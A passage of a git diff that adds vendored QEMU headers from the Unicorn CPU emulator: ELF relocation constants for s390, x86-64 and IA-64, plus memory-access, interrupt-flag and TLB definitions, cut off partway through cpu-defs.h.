R_390_GOTPCDBL 21 /* 32 bit PC rel. GOT shifted by 1. */ +#define R_390_64 22 /* Direct 64 bit. */ +#define R_390_PC64 23 /* PC relative 64 bit. */ +#define R_390_GOT64 24 /* 64 bit GOT offset. */ +#define R_390_PLT64 25 /* 64 bit PC relative PLT address. */ +#define R_390_GOTENT 26 /* 32 bit PC rel. to GOT entry >> 1. */ +#define R_390_GOTOFF16 27 /* 16 bit offset to GOT. */ +#define R_390_GOTOFF64 28 /* 64 bit offset to GOT. */ +#define R_390_GOTPLT12 29 /* 12 bit offset to jump slot. */ +#define R_390_GOTPLT16 30 /* 16 bit offset to jump slot. */ +#define R_390_GOTPLT32 31 /* 32 bit offset to jump slot. */ +#define R_390_GOTPLT64 32 /* 64 bit offset to jump slot. */ +#define R_390_GOTPLTENT 33 /* 32 bit rel. offset to jump slot. */ +#define R_390_PLTOFF16 34 /* 16 bit offset from GOT to PLT. */ +#define R_390_PLTOFF32 35 /* 32 bit offset from GOT to PLT. */ +#define R_390_PLTOFF64 36 /* 16 bit offset from GOT to PLT. */ +#define R_390_TLS_LOAD 37 /* Tag for load insn in TLS code. */ +#define R_390_TLS_GDCALL 38 /* Tag for function call in general + dynamic TLS code. */ +#define R_390_TLS_LDCALL 39 /* Tag for function call in local + dynamic TLS code. */ +#define R_390_TLS_GD32 40 /* Direct 32 bit for general dynamic + thread local data. */ +#define R_390_TLS_GD64 41 /* Direct 64 bit for general dynamic + thread local data. */ +#define R_390_TLS_GOTIE12 42 /* 12 bit GOT offset for static TLS + block offset. */ +#define R_390_TLS_GOTIE32 43 /* 32 bit GOT offset for static TLS + block offset. */ +#define R_390_TLS_GOTIE64 44 /* 64 bit GOT offset for static TLS + block offset. */ +#define R_390_TLS_LDM32 45 /* Direct 32 bit for local dynamic + thread local data in LD code. */ +#define R_390_TLS_LDM64 46 /* Direct 64 bit for local dynamic + thread local data in LD code. */ +#define R_390_TLS_IE32 47 /* 32 bit address of GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_IE64 48 /* 64 bit address of GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_IEENT 49 /* 32 bit rel. offset to GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_LE32 50 /* 32 bit negated offset relative to + static TLS block. */ +#define R_390_TLS_LE64 51 /* 64 bit negated offset relative to + static TLS block. */ +#define R_390_TLS_LDO32 52 /* 32 bit offset relative to TLS + block. */ +#define R_390_TLS_LDO64 53 /* 64 bit offset relative to TLS + block. */ +#define R_390_TLS_DTPMOD 54 /* ID of module containing symbol. */ +#define R_390_TLS_DTPOFF 55 /* Offset in TLS block. */ +#define R_390_TLS_TPOFF 56 /* Negate offset in static TLS + block. */ +/* Keep this the last entry. */ +#define R_390_NUM 57 + +/* x86-64 relocation types */ +#define R_X86_64_NONE 0 /* No reloc */ +#define R_X86_64_64 1 /* Direct 64 bit */ +#define R_X86_64_PC32 2 /* PC relative 32 bit signed */ +#define R_X86_64_GOT32 3 /* 32 bit GOT entry */ +#define R_X86_64_PLT32 4 /* 32 bit PLT address */ +#define R_X86_64_COPY 5 /* Copy symbol at runtime */ +#define R_X86_64_GLOB_DAT 6 /* Create GOT entry */ +#define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */ +#define R_X86_64_RELATIVE 8 /* Adjust by program base */ +#define R_X86_64_GOTPCREL 9 /* 32 bit signed pc relative + offset to GOT */ +#define R_X86_64_32 10 /* Direct 32 bit zero extended */ +#define R_X86_64_32S 11 /* Direct 32 bit sign extended */ +#define R_X86_64_16 12 /* Direct 16 bit zero extended */ +#define R_X86_64_PC16 13 /* 16 bit sign extended pc relative */ +#define R_X86_64_8 14 /* Direct 8 bit sign extended */ +#define R_X86_64_PC8 15 /* 8 bit sign extended pc relative */ + +#define R_X86_64_NUM 16 + +/* IA-64 relocations. */ +#define R_IA64_NONE 0x00 /* none */ +#define R_IA64_IMM14 0x21 /* symbol + addend, add imm14 */ +#define R_IA64_IMM22 0x22 /* symbol + addend, add imm22 */ +#define R_IA64_IMM64 0x23 /* symbol + addend, mov imm64 */ +#define R_IA64_DIR32MSB 0x24 /* symbol + addend, data4 MSB */ +#define R_IA64_DIR32LSB 0x25 /* symbol + addend, data4 LSB */ +#define R_IA64_DIR64MSB 0x26 /* symbol + addend, data8 MSB */ +#define R_IA64_DIR64LSB 0x27 /* symbol + addend, data8 LSB */ +#define R_IA64_GPREL22 0x2a /* @gprel(sym + add), add imm22 */ +#define R_IA64_GPREL64I 0x2b /* @gprel(sym + add), mov imm64 */ +#define R_IA64_GPREL32MSB 0x2c /* @gprel(sym + add), data4 MSB */ +#define R_IA64_GPREL32LSB 0x2d /* @gprel(sym + add), data4 LSB */ +#define R_IA64_GPREL64MSB 0x2e /* @gprel(sym + add), data8 MSB */ +#define R_IA64_GPREL64LSB 0x2f /* @gprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF22 0x32 /* @ltoff(sym + add), add imm22 */ +#define R_IA64_LTOFF64I 0x33 /* @ltoff(sym + add), mov imm64 */ +#define R_IA64_PLTOFF22 0x3a /* @pltoff(sym + add), add imm22 */ +#define R_IA64_PLTOFF64I 0x3b /* @pltoff(sym + add), mov imm64 */ +#define R_IA64_PLTOFF64MSB 0x3e /* @pltoff(sym + add), data8 MSB */ +#define R_IA64_PLTOFF64LSB 0x3f /* @pltoff(sym + add), data8 LSB */ +#define R_IA64_FPTR64I 0x43 /* @fptr(sym + add), mov imm64 */ +#define R_IA64_FPTR32MSB 0x44 /* @fptr(sym + add), data4 MSB */ +#define R_IA64_FPTR32LSB 0x45 /* @fptr(sym + add), data4 LSB */ +#define R_IA64_FPTR64MSB 0x46 /* @fptr(sym + add), data8 MSB */ +#define R_IA64_FPTR64LSB 0x47 /* @fptr(sym + add), data8 LSB */ +#define R_IA64_PCREL60B 0x48 /* @pcrel(sym + add), brl */ +#define R_IA64_PCREL21B 0x49 /* @pcrel(sym + add), ptb, call */ +#define R_IA64_PCREL21M 0x4a /* @pcrel(sym + add), chk.s */ +#define R_IA64_PCREL21F 0x4b /* @pcrel(sym + add), fchkf */ +#define R_IA64_PCREL32MSB 0x4c /* @pcrel(sym + add), data4 MSB */ +#define R_IA64_PCREL32LSB 0x4d /* @pcrel(sym + add), data4 LSB */ +#define R_IA64_PCREL64MSB 0x4e /* @pcrel(sym + add), data8 MSB */ +#define R_IA64_PCREL64LSB 0x4f /* @pcrel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_FPTR22 0x52 /* @ltoff(@fptr(s+a)), imm22 */ +#define R_IA64_LTOFF_FPTR64I 0x53 /* @ltoff(@fptr(s+a)), imm64 */ +#define R_IA64_LTOFF_FPTR32MSB 0x54 /* @ltoff(@fptr(s+a)), data4 MSB */ +#define R_IA64_LTOFF_FPTR32LSB 0x55 /* @ltoff(@fptr(s+a)), data4 LSB */ +#define R_IA64_LTOFF_FPTR64MSB 0x56 /* @ltoff(@fptr(s+a)), data8 MSB */ +#define R_IA64_LTOFF_FPTR64LSB 0x57 /* @ltoff(@fptr(s+a)), data8 LSB */ +#define R_IA64_SEGREL32MSB 0x5c /* @segrel(sym + add), data4 MSB */ +#define R_IA64_SEGREL32LSB 0x5d /* @segrel(sym + add), data4 LSB */ +#define R_IA64_SEGREL64MSB 0x5e /* @segrel(sym + add), data8 MSB */ +#define R_IA64_SEGREL64LSB 0x5f /* @segrel(sym + add), data8 LSB */ +#define R_IA64_SECREL32MSB 0x64 /* @secrel(sym + add), data4 MSB */ +#define R_IA64_SECREL32LSB 0x65 /* @secrel(sym + add), data4 LSB */ +#define R_IA64_SECREL64MSB 0x66 /* @secrel(sym + add), data8 MSB */ +#define R_IA64_SECREL64LSB 0x67 /* @secrel(sym + add), data8 LSB */ +#define R_IA64_REL32MSB 0x6c /* data 4 + REL */ +#define R_IA64_REL32LSB 0x6d /* data 4 + REL */ +#define R_IA64_REL64MSB 0x6e /* data 8 + REL */ +#define R_IA64_REL64LSB 0x6f /* data 8 + REL */ +#define R_IA64_LTV32MSB 0x74 /* symbol + addend, data4 MSB */ +#define R_IA64_LTV32LSB 0x75 /* symbol + addend, data4 LSB */ +#define R_IA64_LTV64MSB 0x76 /* symbol + addend, data8 MSB */ +#define R_IA64_LTV64LSB 0x77 /* symbol + addend, data8 LSB */ +#define R_IA64_PCREL21BI 0x79 /* @pcrel(sym + add), 21bit inst */ +#define R_IA64_PCREL22 0x7a /* @pcrel(sym + add), 22bit inst */ +#define R_IA64_PCREL64I 0x7b /* @pcrel(sym + add), 64bit inst */ +#define R_IA64_IPLTMSB 0x80 /* dynamic reloc, imported PLT, MSB */ +#define R_IA64_IPLTLSB 0x81 /* dynamic reloc, imported PLT, LSB */ +#define R_IA64_COPY 0x84 /* copy relocation */ +#define R_IA64_SUB 0x85 /* Addend and symbol difference */ +#define R_IA64_LTOFF22X 0x86 /* LTOFF22, relaxable. */ +#define R_IA64_LDXMOV 0x87 /* Use of LTOFF22X. */ +#define R_IA64_TPREL14 0x91 /* @tprel(sym + add), imm14 */ +#define R_IA64_TPREL22 0x92 /* @tprel(sym + add), imm22 */ +#define R_IA64_TPREL64I 0x93 /* @tprel(sym + add), imm64 */ +#define R_IA64_TPREL64MSB 0x96 /* @tprel(sym + add), data8 MSB */ +#define R_IA64_TPREL64LSB 0x97 /* @tprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_TPREL22 0x9a /* @ltoff(@tprel(s+a)), imm2 */ +#define R_IA64_DTPMOD64MSB 0xa6 /* @dtpmod(sym + add), data8 MSB */ +#define R_IA64_DTPMOD64LSB 0xa7 /* @dtpmod(sym + add), data8 LSB */ +#define R_IA64_LTOFF_DTPMOD22 0xaa /* @ltoff(@dtpmod(sym + add)), imm22 */ +#define R_IA64_DTPREL14 0xb1 /* @dtprel(sym + add), imm14 */ +#define R_IA64_DTPREL22 0xb2 /* @dtprel(sym + add), imm22 */ +#define R_IA64_DTPREL64I 0xb3 /* @dtprel(sym + add), imm64 */ +#define R_IA64_DTPREL32MSB 0xb4 /* @dtprel(sym + add), data4 MSB */ +#define R_IA64_DTPREL32LSB 0xb5 /* @dtprel(sym + add), data4 LSB */ +#define R_IA64_DTPREL64MSB 0xb6 /* @dtprel(sym + add), data8 MSB */ +#define R_IA64_DTPREL64LSB 0xb7 /* @dtprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_DTPREL22 0xba /* @ltoff(@dtprel(s+a)), imm22 */ + +#endif /* QEMU_ELF_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h new file mode 100644 index 0000000..58e825a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h @@ -0,0 +1,35 @@ +/* + * Internal memory management interfaces + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + */ + +#ifndef EXEC_MEMORY_H +#define EXEC_MEMORY_H + +/* + * Internal interfaces between memory.c/exec.c/vl.c. Do not #include unless + * you're one of them. + */ + +#include "exec/memory.h" + +#ifndef CONFIG_USER_ONLY + +/* Get the root memory region. This interface should only be used temporarily + * until a proper bus interface is available. + */ +MemoryRegion *get_system_memory(struct uc_struct *uc); + +extern AddressSpace address_space_memory; + +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h new file mode 100644 index 0000000..6d196ba --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h @@ -0,0 +1,309 @@ +/* + * defines common to all virtual CPUs + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#ifndef CPU_ALL_H +#define CPU_ALL_H + +#include "qemu-common.h" +#include "exec/cpu-common.h" +#include "exec/memory.h" +#include "qemu/thread.h" +#include "qom/cpu.h" + +/* some important defines: + * + * WORDS_ALIGNED : if defined, the host cpu can only make word aligned + * memory accesses. + * + * HOST_WORDS_BIGENDIAN : if defined, the host cpu is big endian and + * otherwise little endian. + * + * (TARGET_WORDS_ALIGNED : same for target cpu (not supported yet)) + * + * TARGET_WORDS_BIGENDIAN : same for target cpu + */ + +#if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) +#define BSWAP_NEEDED +#endif + +#ifdef BSWAP_NEEDED + +static inline uint16_t tswap16(uint16_t s) +{ + return bswap16(s); +} + +static inline uint32_t tswap32(uint32_t s) +{ + return bswap32(s); +} + +static inline uint64_t tswap64(uint64_t s) +{ + return bswap64(s); +} + +static inline void tswap16s(uint16_t *s) +{ + *s = bswap16(*s); +} + +static inline void tswap32s(uint32_t *s) +{ + *s = bswap32(*s); +} + +static inline void tswap64s(uint64_t *s) +{ + *s = bswap64(*s); +} + +#else + +static inline uint16_t tswap16(uint16_t s) +{ + return s; +} + +static inline uint32_t tswap32(uint32_t s) +{ + return s; +} + +static inline uint64_t tswap64(uint64_t s) +{ + return s; +} + +static inline void tswap16s(uint16_t *s) +{ +} + +static inline void tswap32s(uint32_t *s) +{ +} + +static inline void tswap64s(uint64_t *s) +{ +} + +#endif + +#if TARGET_LONG_SIZE == 4 +#define tswapl(s) tswap32(s) +#define tswapls(s) tswap32s((uint32_t *)(s)) +#define bswaptls(s) bswap32s(s) +#else +#define tswapl(s) tswap64(s) +#define tswapls(s) tswap64s((uint64_t *)(s)) +#define bswaptls(s) bswap64s(s) +#endif + +/* CPU memory access without any memory or io remapping */ + +/* + * the generic syntax for the memory accesses is: + * + * load: ld{type}{sign}{size}{endian}_{access_type}(ptr) + * + * store: st{type}{size}{endian}_{access_type}(ptr, val) + * + * type is: + * (empty): integer access + * f : float access + * + * sign is: + * (empty): for floats or 32 bit size + * u : unsigned + * s : signed + * + * size is: + * b: 8 bits + * w: 16 bits + * l: 32 bits + * q: 64 bits + * + * endian is: + * (empty): target cpu endianness or 8 bit access + * r : reversed target cpu endianness (not implemented yet) + * be : big endian (not implemented yet) + * le : little endian (not implemented yet) + * + * access_type is: + * raw : host memory access + * user : user mode access using soft MMU + * kernel : kernel mode access using soft MMU + */ + +/* target-endianness CPU memory access functions */ +#if defined(TARGET_WORDS_BIGENDIAN) +#define lduw_p(p) lduw_be_p(p) +#define ldsw_p(p) ldsw_be_p(p) +#define ldl_p(p) ldl_be_p(p) +#define ldq_p(p) ldq_be_p(p) +#define ldfl_p(p) ldfl_be_p(p) +#define ldfq_p(p) ldfq_be_p(p) +#define stw_p(p, v) stw_be_p(p, v) +#define stl_p(p, v) stl_be_p(p, v) +#define stq_p(p, v) stq_be_p(p, v) +#define stfl_p(p, v) stfl_be_p(p, v) +#define stfq_p(p, v) stfq_be_p(p, v) +#else +#define lduw_p(p) lduw_le_p(p) +#define ldsw_p(p) ldsw_le_p(p) +#define ldl_p(p) ldl_le_p(p) +#define ldq_p(p) ldq_le_p(p) +#define ldfl_p(p) ldfl_le_p(p) +#define ldfq_p(p) ldfq_le_p(p) +#define stw_p(p, v) stw_le_p(p, v) +#define stl_p(p, v) stl_le_p(p, v) +#define stq_p(p, v) stq_le_p(p, v) +#define stfl_p(p, v) stfl_le_p(p, v) +#define stfq_p(p, v) stfq_le_p(p, v) +#endif + +/* MMU memory access macros */ + +#if defined(CONFIG_USER_ONLY) +#include <assert.h> +#include "exec/user/abitypes.h" + +/* On some host systems the guest address space is reserved on the host. + * This allows the guest address space to be offset to a convenient location. + */ +#if defined(CONFIG_USE_GUEST_BASE) +extern unsigned long guest_base; +extern int have_guest_base; +extern unsigned long reserved_va; +#define GUEST_BASE guest_base +#define RESERVED_VA reserved_va +#else +#define GUEST_BASE 0ul +#define RESERVED_VA 0ul +#endif + +#define GUEST_ADDR_MAX (RESERVED_VA ? RESERVED_VA : \ + (1ul << TARGET_VIRT_ADDR_SPACE_BITS) - 1) +#endif + +/* page related stuff */ + +#define TARGET_PAGE_SIZE (1 << TARGET_PAGE_BITS) +#define TARGET_PAGE_MASK ~(TARGET_PAGE_SIZE - 1) +#define TARGET_PAGE_ALIGN(addr) (((addr) + TARGET_PAGE_SIZE - 1) & TARGET_PAGE_MASK) + +#define HOST_PAGE_ALIGN(addr) (((addr) + qemu_host_page_size - 1) & qemu_host_page_mask) + +/* same as PROT_xxx */ +#define PAGE_READ 0x0001 +#define PAGE_WRITE 0x0002 +#define PAGE_EXEC 0x0004 +#define PAGE_BITS (PAGE_READ | PAGE_WRITE | PAGE_EXEC) +#define PAGE_VALID 0x0008 +/* original state of the write flag (used when tracking self-modifying + code */ +#define PAGE_WRITE_ORG 0x0010 +#if defined(CONFIG_BSD) && defined(CONFIG_USER_ONLY) +/* FIXME: Code that sets/uses this is broken and needs to go away. */ +#define PAGE_RESERVED 0x0020 +#endif + +#if defined(CONFIG_USER_ONLY) +//void page_dump(FILE *f); + +int page_get_flags(target_ulong address); +#endif + +CPUArchState *cpu_copy(CPUArchState *env); + +/* Flags for use in ENV->INTERRUPT_PENDING. + + The numbers assigned here are non-sequential in order to preserve + binary compatibility with the vmstate dump. Bit 0 (0x0001) was + previously used for CPU_INTERRUPT_EXIT, and is cleared when loading + the vmstate dump. */ + +/* External hardware interrupt pending. This is typically used for + interrupts from devices. */ +#define CPU_INTERRUPT_HARD 0x0002 + +/* Exit the current TB. This is typically used when some system-level device + makes some change to the memory mapping. E.g. the a20 line change. */ +#define CPU_INTERRUPT_EXITTB 0x0004 + +/* Halt the CPU. */ +#define CPU_INTERRUPT_HALT 0x0020 + +/* Debug event pending. */ +#define CPU_INTERRUPT_DEBUG 0x0080 + +/* Reset signal. */ +#define CPU_INTERRUPT_RESET 0x0400 + +/* Several target-specific external hardware interrupts. Each target/cpu.h + should define proper names based on these defines. */ +#define CPU_INTERRUPT_TGT_EXT_0 0x0008 +#define CPU_INTERRUPT_TGT_EXT_1 0x0010 +#define CPU_INTERRUPT_TGT_EXT_2 0x0040 +#define CPU_INTERRUPT_TGT_EXT_3 0x0200 +#define CPU_INTERRUPT_TGT_EXT_4 0x1000 + +/* Several target-specific internal interrupts. These differ from the + preceding target-specific interrupts in that they are intended to + originate from within the cpu itself, typically in response to some + instruction being executed. These, therefore, are not masked while + single-stepping within the debugger. */ +#define CPU_INTERRUPT_TGT_INT_0 0x0100 +#define CPU_INTERRUPT_TGT_INT_1 0x0800 +#define CPU_INTERRUPT_TGT_INT_2 0x2000 + +/* First unused bit: 0x4000. */ + +/* The set of all bits that should be masked when single-stepping. */ +#define CPU_INTERRUPT_SSTEP_MASK \ + (CPU_INTERRUPT_HARD \ + | CPU_INTERRUPT_TGT_EXT_0 \ + | CPU_INTERRUPT_TGT_EXT_1 \ + | CPU_INTERRUPT_TGT_EXT_2 \ + | CPU_INTERRUPT_TGT_EXT_3 \ + | CPU_INTERRUPT_TGT_EXT_4) + +#if !defined(CONFIG_USER_ONLY) + +/* memory API */ + +/* Flags stored in the low bits of the TLB virtual address. These are + defined so that fast path ram access is all zeros. */ +/* Zero if TLB entry is valid. */ +#define TLB_INVALID_MASK (1 << 3) +/* Set if TLB entry references a clean RAM page. The iotlb entry will + contain the page physical address. */ +#define TLB_NOTDIRTY (1 << 4) +/* Set if TLB entry is an IO callback. */ +#define TLB_MMIO (1 << 5) + +ram_addr_t last_ram_offset(struct uc_struct *uc); +void qemu_mutex_lock_ramlist(struct uc_struct *uc); +void qemu_mutex_unlock_ramlist(struct uc_struct *uc); +#endif /* !CONFIG_USER_ONLY */ + +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write); + +#endif /* CPU_ALL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h new file mode 100644 index 0000000..40664d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h @@ -0,0 +1,120 @@ +#ifndef CPU_COMMON_H +#define CPU_COMMON_H 1 + +/* CPU interfaces that are target independent. */ + +struct uc_struct; + +#ifndef CONFIG_USER_ONLY +#include "exec/hwaddr.h" +#endif + +#include "qemu/bswap.h" +#include "qemu/queue.h" + +typedef enum MMUAccessType { + MMU_DATA_LOAD = 0, + MMU_DATA_STORE = 1, + MMU_INST_FETCH = 2 +} MMUAccessType; + +#if !defined(CONFIG_USER_ONLY) + +enum device_endian { + DEVICE_NATIVE_ENDIAN, + DEVICE_BIG_ENDIAN, + DEVICE_LITTLE_ENDIAN, +}; + +/* address in the RAM (different from a physical address) */ +#if defined(CONFIG_XEN_BACKEND) +typedef uint64_t ram_addr_t; +# define RAM_ADDR_MAX UINT64_MAX +# define RAM_ADDR_FMT "%" PRIx64 +#else +typedef uintptr_t ram_addr_t; +# define RAM_ADDR_MAX UINTPTR_MAX +# define RAM_ADDR_FMT "%" PRIxPTR +#endif + +extern ram_addr_t ram_size; + +/* memory API */ + +typedef void CPUWriteMemoryFunc(void *opaque, hwaddr addr, uint32_t value); +typedef uint32_t CPUReadMemoryFunc(void *opaque, hwaddr addr); + +void qemu_ram_remap(struct uc_struct *uc, ram_addr_t addr, ram_addr_t length); +/* This should not be used by devices. */ +MemoryRegion *qemu_ram_addr_from_host(struct uc_struct* uc, void *ptr, ram_addr_t *ram_addr); +void qemu_ram_set_idstr(struct uc_struct *uc, ram_addr_t addr, const char *name, DeviceState *dev); +void qemu_ram_unset_idstr(struct uc_struct *uc, ram_addr_t addr); + +bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, int is_write); +static inline void cpu_physical_memory_read(AddressSpace *as, hwaddr addr, + void *buf, int len) +{ + cpu_physical_memory_rw(as, addr, buf, len, 0); +} +static inline void cpu_physical_memory_write(AddressSpace *as, hwaddr addr, + const void *buf, int len) +{ + cpu_physical_memory_rw(as, addr, (void *)buf, len, 1); +} +void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, + int is_write); +void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len); +void *cpu_register_map_client(void *opaque, void (*callback)(void *opaque)); + +bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr); + +/* Coalesced MMIO regions are areas where write operations can be reordered. + * This usually implies that write operations are side-effect free. This allows + * batching which can make a major impact on performance when using + * virtualization. + */ +void qemu_flush_coalesced_mmio_buffer(void); + +uint32_t ldub_phys(AddressSpace *as, hwaddr addr); +uint32_t lduw_le_phys(AddressSpace *as, hwaddr addr); +uint32_t lduw_be_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_le_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_be_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_le_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_be_phys(AddressSpace *as, hwaddr addr); +void stb_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_le_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_be_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_le_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_be_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stq_le_phys(AddressSpace *as, hwaddr addr, uint64_t val); +void stq_be_phys(AddressSpace *as, hwaddr addr, uint64_t val); + +#ifdef NEED_CPU_H +uint32_t lduw_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_phys(AddressSpace *as, hwaddr addr); +void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stq_phys(AddressSpace *as, hwaddr addr, uint64_t val); +#endif + +void cpu_physical_memory_write_rom(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len); +void cpu_flush_icache_range(AddressSpace *as, hwaddr start, int len); + +extern struct MemoryRegion io_mem_rom; +extern struct MemoryRegion io_mem_notdirty; + +typedef void (RAMBlockIterFunc)(void *host_addr, + ram_addr_t offset, ram_addr_t length, void *opaque); + +void qemu_ram_foreach_block(struct uc_struct *uc, RAMBlockIterFunc func, void *opaque); + +#endif + +#endif /* !CPU_COMMON_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h new file mode 100644 index 0000000..8422656 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h @@ -0,0 +1,151 @@ +/* + * common defines for all CPUs + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#ifndef CPU_DEFS_H +#define CPU_DEFS_H + +#ifndef NEED_CPU_H +#error cpu.h included from common code +#endif + +#include "config.h" +#include "unicorn/platform.h" +#include "qemu/osdep.h" +#include "qemu/queue.h" +#ifndef CONFIG_USER_ONLY +#include "exec/hwaddr.h" +#endif + +#ifndef TARGET_LONG_BITS +#error TARGET_LONG_BITS must be defined before including this header +#endif + +#define TARGET_LONG_SIZE (TARGET_LONG_BITS / 8) + +/* target_ulong is the type of a virtual address */ +#if TARGET_LONG_SIZE == 4 +typedef int32_t target_long; +typedef uint32_t target_ulong; +#define TARGET_FMT_lx "%08x" +#define TARGET_FMT_ld "%d" +#define TARGET_FMT_lu "%u" +#elif TARGET_LONG_SIZE == 8 +typedef int64_t target_long; +typedef uint64_t target_ulong; +#define TARGET_FMT_lx "%016" PRIx64 +#define TARGET_FMT_ld "%" PRId64 +#define TARGET_FMT_lu "%" PRIu64 +#else +#error TARGET_LONG_SIZE undefined +#endif + +#define EXCP_INTERRUPT 0x10000 /* async interruption */ +#define EXCP_HLT 0x10001 /* hlt instruction reached */ +#define EXCP_DEBUG 0x10002 /* cpu stopped after a breakpoint or singlestep */ +#define EXCP_HALTED 0x10003 /* cpu is halted (waiting for external event) */ +#define EXCP_YIELD 0x10004 /* cpu wants to yield timeslice to another */ + +/* Only the bottom TB_JMP_PAGE_BITS of the jump cache hash bits vary for + addresses on the same page. The top bits are the same. This allows + TLB invalidation to quickly clear a subset of the hash table. */ +#define TB_JMP_PAGE_BITS (TB_JMP_CACHE_BITS / 2) +#define TB_JMP_PAGE_SIZE (1 << TB_JMP_PAGE_BITS) +#define TB_JMP_ADDR_MASK (TB_JMP_PAGE_SIZE - 1) +#define TB_JMP_PAGE_MASK (TB_JMP_CACHE_SIZE - TB_JMP_PAGE_SIZE) + +#if !defined(CONFIG_USER_ONLY) +#define CPU_TLB_BITS 8 +#define CPU_TLB_SIZE (1 << CPU_TLB_BITS) +/* use a fully associative victim tlb of 8 entries */ +#define CPU_VTLB_SIZE 8 + +#if HOST_LONG_BITS == 32 && TARGET_LONG_BITS == 32 +#define CPU_TLB_ENTRY_BITS 4 +#else +#define CPU_TLB_ENTRY_BITS 5 +#endif + +typedef struct CPUTLBEntry { + /* bit TARGET_LONG_BITS to TARGET_PAGE_BITS : virtual address + bit TARGET_PAGE_BITS-1..4 : Nonzero for accesses that should not + go directly to ram. + bit 3 : indicates that the entry is invalid + bit 2..0 : zero + */ + target_ulong addr_read; + target_ulong addr_write; + target_ulong addr_code; + /* Addend to virtual address to get host address. IO accesses + use the corresponding iotlb value. */ + uintptr_t addend; + /* padding to get a power of two size */ + +#ifdef _MSC_VER +# define TARGET_ULONG_SIZE (TARGET_LONG_BITS/8) +# ifdef _WIN64 +# define UINTPTR_SIZE 8 +# else +# define UINTPTR_SIZE 4 +# endif + +#define DUMMY_SIZE (1 << CPU_TLB_ENTRY_BITS) - \ + (TARGET_ULONG_SIZE * 3 + \ + ((-TARGET_ULONG_SIZE * 3) & (UINTPTR_SIZE - 1)) + \ + UINTPTR_SIZE) + +#if DUMMY_SIZE > 0 + uint8_t dummy[DUMMY_SIZE]; +#endif +#else // _MSC_VER + uint8_t dummy[(1 << CPU_TLB_ENTRY_BITS) - + (sizeof(target_ulong) * 3 + + ((-sizeof(target_ulong) * 3) & (sizeof(uintptr_t) - 1)) + + sizeof(uintptr_t))]; +#endif // _MSC_VER +} CPUTLBEntry; + +QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS)); + +#define CPU_COMMON_TLB \ + /* The meaning of the MMU modes is defined in the target code. */ \ + CPUTLBEntry tlb_table[NB_MMU_MODES][CPU_TLB_SIZE]; \ + CPUTLBEntry tlb_v_table[NB_MMU_MODES][CPU_VTLB_SIZE]; \ + hwaddr iotlb[NB_MMU_MODES][CPU_TLB_SIZE]; \ + hwaddr 